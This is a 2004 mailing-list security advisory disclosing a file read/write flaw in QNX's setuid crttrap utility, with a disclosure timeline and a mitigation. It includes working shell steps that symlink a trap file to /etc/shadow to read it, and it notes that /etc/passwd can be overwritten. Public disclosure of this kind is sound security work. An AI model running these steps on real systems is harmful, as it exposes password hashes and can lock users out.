mailing list archives
QNX crrtrap arbitrary file read/write vulnerability [RLSA_06-2004]
From: Julio Cesar Fort <julio () rfdslabs com br>
Date: 29 Dec 2004 02:30:59 -0000
*** rfdslabs security advisory ***
Title: QNX crrtrap arbitrary file read/write vulnerability [RLSA_06-2004]
Versions: QNX RTOS 2.4, 4.25, 6.1.0, 6.2.0 (+ Update Patch A)
Date: Dec 11 2004
Author: Julio Cesar Fort <julio *NO_SPAM* rfdslabs com br>
crrtrap is a tool to detect video hardware and starts the correct driver for QNX.
crttrap has a '-c' flag to specify where trap file will be written. Combined with 'trap' flag it is possible to
read/write any file in the disk.
By default crttrap writes and read trap files in "/etc/system/config". Once this directory is owned by root we don't
have permission to write. It filters "../" to prevent directory transversal vulnerabilities. In order to bypass this
protection we noticed it doesn't check only for "/".
This way is possible to make it create a sub directory, giving our group read and write priviledges. Now we are able to
manipulate our trap file.
$ crttrap -c tmp/rfdslabs trap
/usr/photon/bin/devgt-iographics -dldevg-svga.so -I0 -d0x5333, 0x8c12
/usr/photon/bin/devgt-iographics -dldevg-vesabios.so -I0 -d0x5333, 0x8c12
crttrap: wrote config file as /etc/system/config/tmp/rfdslabs
$ cd /etc/system/config/tmp
$ ls -la
drwxrwxr-x 2 root 100 2048 Dec 11 12:40 .
drwxrwxr-x 3 root root 2048 Dec 11 12:35 ..
-rw-r--r-- 1 root 100 21671 Dec 11 12:40 rfdslabs
$ rm -f rfdslabs
$ ln -s /etc/shadow rfdslabs
$ crttrap -c tmp/rfdslabs dump
We are also able to overwrite any file with 'trap' switch. As an example, an attacker can corrupt '/etc/passwd' and
make login attempts fail everytime.
See www.rfdslabs.com.br for another file deletion vulnerability in crttrap.
PS: In 31 May 2002, Simon Oullette had found a bug in crttrap '-c' flag in QNX 4.25. But his exploitation technique
won't work with newest versions because crttrap opens "/etc/system/config" and its subdirectories.
No official solution yet. We suggest remove crttrap suid bit until QNX don't release a patch.
10 Dec 2004: Vulnerability detected;
11 Dec 2004: Advisory written; rfdslabs contacts QNX;
20 Dec 2004: QNX replies back rfdslabs;
28 Dec 2004: Advisory released to public.
Thanks to Lucien Rocha, Carlos Barros (barrossecurity.com), George Fleury,
Rodrigo Costa (NERV).
www.rfdslabs.com.br - computers, sex, human mind, music and more
Recife, PE, Brazil
- QNX crrtrap arbitrary file read/write vulnerability [RLSA_06-2004] Julio Cesar Fort (Dec 29)